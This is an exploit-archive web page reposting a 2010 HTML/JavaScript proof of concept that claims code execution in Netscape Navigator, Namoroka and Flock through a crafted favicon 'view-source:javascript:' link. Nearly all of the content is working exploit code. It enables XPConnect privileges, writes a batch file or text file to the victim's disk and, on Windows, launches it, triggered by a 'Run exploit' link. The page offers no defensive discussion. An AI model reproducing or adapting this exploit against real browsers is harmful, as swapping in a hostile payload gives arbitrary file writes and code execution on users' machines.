首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Netscape Navigator - Namoroka - Flock <= URL Code Execution Exploit
来源:vfocus.net 作者:eidelweiss 发布时间:2010-03-09  

<html>
<head>
<title>firelinking By eidelweiss</title>

<-- Copyright (C) 2009-2010 firelinking by eidelweiss -->
<-- Greets: AL-MARHUM , [D]eal [C]yber , My Mother (i miss u) , and all my friends -->
<-- This PoC is cross platform : On Windows this example creates the file -->
<-- c:\mampus.bat and launches it (opens a dos box with a dir command). On -->
<-- Linux (tested Fedora Core) the example creates the file -->
<-- ~/mampus.txt Depending on caching the the script might -->
<-- run twice in some cases (this will create an additional mampus-1.txt). -->

<link rel="SHORTCUT ICON" href="favicon.ico">
<script language="JavaScript" type="text/javascript">
var pf = navigator.platform.toLowerCase();
if (pf.indexOf("win") != -1) {
var os = "win";
} else if (pf.indexOf("linux") != -1) {
var os = "linux";
}
function GoFuck() {
// this is a bad caching workaround inside
document.getElementById('outhtml').innerHTML = "";
document.getElementById('outhtml').innerHTML += document.getElementById('clearhtml').value
document.getElementById('outhtml').innerHTML += document.getElementById('clearhtml').value
document.getElementById('outhtml').innerHTML += document.getElementById('clearhtml').value
window.setTimeout("document.getElementById('outhtml').innerHTML +=
document.getElementById('linkhtml_"+os+"').value",300);
}
</script>
</head>
<body>
<div style="font-family:Verdana;font-size:11px;">

<div style="font-family:Verdana;font-size:15px;font-weight:bold;">firelinking By eidelweiss</div>
<br><br>
<div style="width:600px">
<div id="outhtml" style="display:none"></div>

<textarea id="clearhtml" style="display:none">
<link rel="SHORTCUT ICON" href="favicon.ico">
</textarea>

<textarea id="linkhtml_win" style="display:none">
<link rel="SHORTCUT ICON" href="view-source:javascript:delayedOpenWindow('
javascript:netscape.security.PrivilegeManager.enablePrivilege(\'UniversalXPConnect\');
file=Components.classes[\'@mozilla.org/file/local;1\'].createInstance(Components.interfaces.
nsILocalFile);file.initWithPath(\'c:\\\\mampus.bat\');file.createUnique(Components.interfaces.
nsIFile.NORMAL_FILE_TYPE,420);outputStream=Components.classes[\'@mozilla.org/network/
file-output-stream;1\'].createInstance(Components.interfaces.nsIFileOutputStream);
outputStream.init(file,0x04|0x08|0x20,420,0);output=\'@ECHO OFF\\n:BEGIN\\nCLS\\nDIR\\n
PAUSE\\n:END\';outputStream.write(output,output.length);outputStream.close();file.launch();','','')">
</textarea>

<textarea id="linkhtml_linux" style="display:none">
<link rel="SHORTCUT ICON" href="view-source:javascript:delayedOpenWindow('javascript:
netscape.security.PrivilegeManager.enablePrivilege(\'UniversalXPConnect\');file=Components.
classes[\'@mozilla.org/file/local;1\'].createInstance(Components.interfaces.nsILocalFile);file.
initWithPath(\'~/mampus.txt\');file.createUnique(Components.interfaces.nsIFile.
NORMAL_FILE_TYPE,420);outputStream=Components.classes[\'@mozilla.org/network/
file-output-stream;1\'].createInstance(Components.interfaces.nsIFileOutputStream);
outputStream.init(file,0x04|0x08|0x20,420,0);output=\'mampus!\';outputStream.write
(output,output.length);outputStream.close();','','')">
</textarea>
<br><br>
<a href="#" onclick="GoFuck();GoFuck();">Run exploit</a>
</div>
</body>
</html>


 
[推荐] [评论(2条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Spamassassin Milter Plugin Rem
·Linux Kernel 64bit Personality
·Lenovo Hotkey Driver / Access
·FreeBSD and OpenBSD 'ftpd' NUL
·QuickZip 4.x (.zip) 0day Local
·TopDownloads MP3 Player 1.0 m3
·QuickZip 4.x (.zip) Buffer Ove
·Apache 2.2.14 mod_isapi Dangli
·BigForum version 4.5 remote SQ
·JITed stage-0 shellcode
·JITed exec notepad Shellcode
·Yahoo Player v1.0 (.m3u/.pls/.
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved